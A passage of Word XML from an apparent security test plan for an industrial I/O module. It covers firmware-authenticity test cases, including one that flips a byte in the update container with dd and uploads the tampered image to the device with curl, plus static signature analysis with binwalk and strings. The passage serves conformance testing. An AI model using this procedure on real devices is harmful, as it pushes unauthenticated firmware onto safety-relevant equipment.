          <w:p w14:paraId="125AA5F8" w14:textId="020A9761" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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Safety: spare unit only; re-flash a validated image afterwards.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52BCEC34" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34BE5C76" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05EDDEFB"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5B9A5BB2"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6D5B99" w:rsidRDefault="00E83DE4" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E8AA1B4" w14:textId="4C6C41EB"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TC-RQ005-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB24B2" w:rsidRPr="006D5B99"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BB24B2" w:rsidRPr="006D5B99" w:rsidRDefault="00BB24B2" w:rsidP="00BB24B2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53DB10E3" w14:textId="334E2A49"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ideally </w:t>
            </w:r>
            <w:r w:rsidR="00477146" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> a second unit for risk-bearing firmware tests. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB24B2" w:rsidRPr="006D5B99"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BB24B2" w:rsidRPr="006D5B99" w:rsidRDefault="00BB24B2" w:rsidP="00BB24B2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3598B281" w14:textId="4C448C4D" w:rsidR="00BB24B2" w:rsidRPr="006D5B99" w:rsidRDefault="00BB24B2" w:rsidP="00BB24B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hex editor (bless/ghex, or xxd/dd) to modify a single byte in the SRIO update container (structure: update container header, netX90 FW, CPU3 FW, Safe Container with safe header + safe app FW).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB24B2" w:rsidRPr="006D5B99"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BB24B2" w:rsidRPr="006D5B99" w:rsidRDefault="00BB24B2" w:rsidP="00BB24B2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="684404C5" w14:textId="1ACBD2AB"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1. Set the rotary switch to 999, power cycle </w:t>
            </w:r>
            <w:r w:rsidR="0005537A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> --&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> device boots into State</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1477E2FE" w14:textId="0662F826"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Update </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="564BF38D"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3ACB5ACA" w14:textId="6DDA7E2A"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2. Back up the current official SRIO update container. Modify </w:t>
            </w:r>
            <w:r w:rsidR="00D92974" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>one</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> byte</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE5BB5B" w14:textId="2BA3E975" w:rsidR="00BB24B2" w:rsidRPr="006D5B99" w:rsidRDefault="00BB24B2" w:rsidP="00D929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OUTSIDE the Safe Container</w:t>
            </w:r>
            <w:r w:rsidR="00D92974" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>do</w:t>
            </w:r>
            <w:r w:rsidR="00D92974" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> not</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> recompute checksums:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B5168D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cp srio_update_official.bin cm_rq005-03_modified.bin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D2F4D8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cm_rq005-03_modified.bin | head -20   # identify a padding byte offset</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ABE1CF1"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Flip 1 byte at the chosen offset, e.g. using a hex editor:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A692EC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ghex cm_rq005-03_modified.bin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4034715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via dd, replacing &lt;OFFSET&gt; with the actual byte offset found above)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36ED09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printf '\xFF' | dd of=cm_rq005-03_modified.bin bs=1 seek=&lt;OFFSET&gt; count=1 conv=notrunc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E9CAB6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1B674F6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Upload via IoT-Core:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="655EE25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41ED47E"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CHUNK=2048</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DCA9CEC"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http://$SRIO/firmware/container/start_stream_set</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F2D796"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split -b $CHUNK cm_rq005-03_modified.bin cm_rq005-03_chunk_</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F4564C5"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f in cm_rq005-03_chunk_*; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743793C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curl -s -X POST http://$SRIO/firmware/container/stream_set --data-binary @$f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="132D650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4F89A3AB"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6E58C710"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Trigger installation and observe the reaction:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ED998E3"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cm_rq005-03_install.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CCB21D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p>
          <w:p w14:paraId="77DE2C17"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5. AFTER the test: re-upload the unmodified, official firmware (repeat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="214E5948" w14:textId="77777777" w:rsidR="00BB24B2" w:rsidRPr="006D5B99" w:rsidRDefault="00BB24B2" w:rsidP="00BB24B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 with the original file) and repeat the functional check from</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56039AE2" w14:textId="55C3DA6C" w:rsidR="00BB24B2" w:rsidRPr="006D5B99" w:rsidRDefault="00BB24B2" w:rsidP="00BB24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TC-RQ001-01 to confirm the device is back to its original state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB24B2" w:rsidRPr="006D5B99"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0E22FA62" w:rsidR="00BB24B2" w:rsidRPr="006D5B99" w:rsidRDefault="00BB24B2" w:rsidP="00BB24B2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06FE7280" w14:textId="32D5B76C" w:rsidR="00BB24B2" w:rsidRPr="006D5B99" w:rsidRDefault="00423765" w:rsidP="00BB24B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Expected FAIL (against the requirement)</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> there is no cryptographic signature check (EDR 3.10/3.14). Whether this specific byte is caught depends on whether an existing consistency check covers it; both acceptance and rejection by a simple checksum confirm the core finding: no signature = no assured authenticity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4574AC04" w14:textId="77777777" w:rsidR="00254A92" w:rsidRPr="006D5B99" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E15A667" w14:textId="77777777" w:rsidR="00423765" w:rsidRPr="006D5B99" w:rsidRDefault="00423765" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18201A6C" w14:textId="77777777" w:rsidR="00423765" w:rsidRPr="006D5B99" w:rsidRDefault="00423765" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C898E65" w14:textId="77777777" w:rsidR="00423765" w:rsidRPr="006D5B99" w:rsidRDefault="00423765" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D36A6D4" w14:textId="77777777" w:rsidR="00254A92" w:rsidRPr="006D5B99" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4941A83B" w14:textId="77777777" w:rsidR="00AD2FC2" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ005-04 -  </w:t>
      </w:r>
      <w:r w:rsidR="00AD2FC2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Update-Package Static Analysis for Signing / Boot-Chain Artefacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E0B370" w14:textId="344EACA3" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">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07AC58E3"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F658DC3" w14:textId="09EE57F3" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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EDR 3.12 / EDR 3.14 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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27206FB8" w14:textId="0F6654A8" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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83DE4" w:rsidRPr="006D5B99"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224EB964" w14:textId="69AC1C4C" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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AD2FC2" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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6EFA1315" w14:textId="07E386DE" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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Characterize</w:t>
            </w:r>
            <w:r w:rsidR="006C0C68" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the absence of signing and secure-boot artefacts by static analysis of the update package (header structure, signature region, binary-hardening posture).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E83DE4" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77C22FFC"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Obtain the legitimate update package.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB7D3F9"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Statically inspect its structure for a signature/header and trust-anchor references.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A4BFA5B" w14:textId="77777777" w:rsidR="006C0C68"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the binary-hardening posture of the contained image.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79BA7825" w14:textId="4FD05B7C" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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presence/absence of each artefact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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B0999C1" w14:textId="481F93CB" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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signature/trust-anchor artefacts present, consistent with an unsigned package </w:t>
            </w:r>
            <w:r w:rsidR="003F685D" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> supports the firmware-authenticity gap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ABA0817" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD505D1" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104CE3E4"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5FCE6310"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19218B6A" w14:textId="6FC87CFC"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TC-RQ005-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00914E97" w:rsidRPr="006D5B99"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914E97" w:rsidRPr="006D5B99" w:rsidRDefault="00914E97" w:rsidP="00914E97">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FCB59B7" w14:textId="21155702" w:rsidR="00914E97" w:rsidRPr="006D5B99" w:rsidRDefault="00914E97" w:rsidP="00914E9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file analysis of the update container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00914E97" w:rsidRPr="006D5B99"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914E97" w:rsidRPr="006D5B99" w:rsidRDefault="00914E97" w:rsidP="00914E97">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42E0F804" w14:textId="30E8A659" w:rsidR="00914E97" w:rsidRPr="006D5B99" w:rsidRDefault="00914E97" w:rsidP="00914E97">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binwalk, file, xxd/hexdump, strings </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00914E97" w:rsidRPr="006D5B99"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914E97" w:rsidRPr="006D5B99" w:rsidRDefault="00914E97" w:rsidP="00914E97">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E6064C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file cm_update_container.bin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1306C7B7"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binwalk -A cm_update_container.bin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06286B69"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strings cm_update_container.bin | grep -i -E "sig|cert|rsa|ecdsa|sha256"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57AD49E6"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xxd cm_update_container.bin | less</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DF8E395" w14:textId="77777777" w:rsidR="00914E97" w:rsidRPr="006D5B99" w:rsidRDefault="00914E97" w:rsidP="00914E9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Compare the identified header fields against the documented structure</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56735A19" w14:textId="4992CC63" w:rsidR="00914E97" w:rsidRPr="006D5B99" w:rsidRDefault="00914E97" w:rsidP="00364A2F">
            <w:pPr>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whether any</w:t>
            </w:r>
            <w:r w:rsidR="00364A2F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>header field goes beyond CRC/compatibility identifiers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00914E97" w:rsidRPr="006D5B99"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669A0B73" w:rsidR="00914E97" w:rsidRPr="006D5B99" w:rsidRDefault="00914E97" w:rsidP="00914E97">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A060D7" w14:textId="60906263" w:rsidR="00914E97" w:rsidRPr="006D5B99" w:rsidRDefault="00914E97" w:rsidP="00914E9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signature/certificate structure found, only CRC/compatibility fields </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the EDR 3.12/3.14 gap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53D8ABA0" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C350676" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E45EFBE" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="158C4977" w14:textId="77777777" w:rsidR="0075093A" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ005-05 -  </w:t>
      </w:r>
      <w:r w:rsidR="006C0C68" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Analytical: Safety Self-Tests ≠ Authenticity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D7EC03" w14:textId="615F0694" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE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6D5B99"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6D5B99" w:rsidRDefault="00E83DE4" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49A991D8"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6D5B99" w:rsidRDefault="00E83DE4" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="039D219B" w14:textId="49C6A157"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RQ-005 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 3.3 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset A, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E83DE4" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
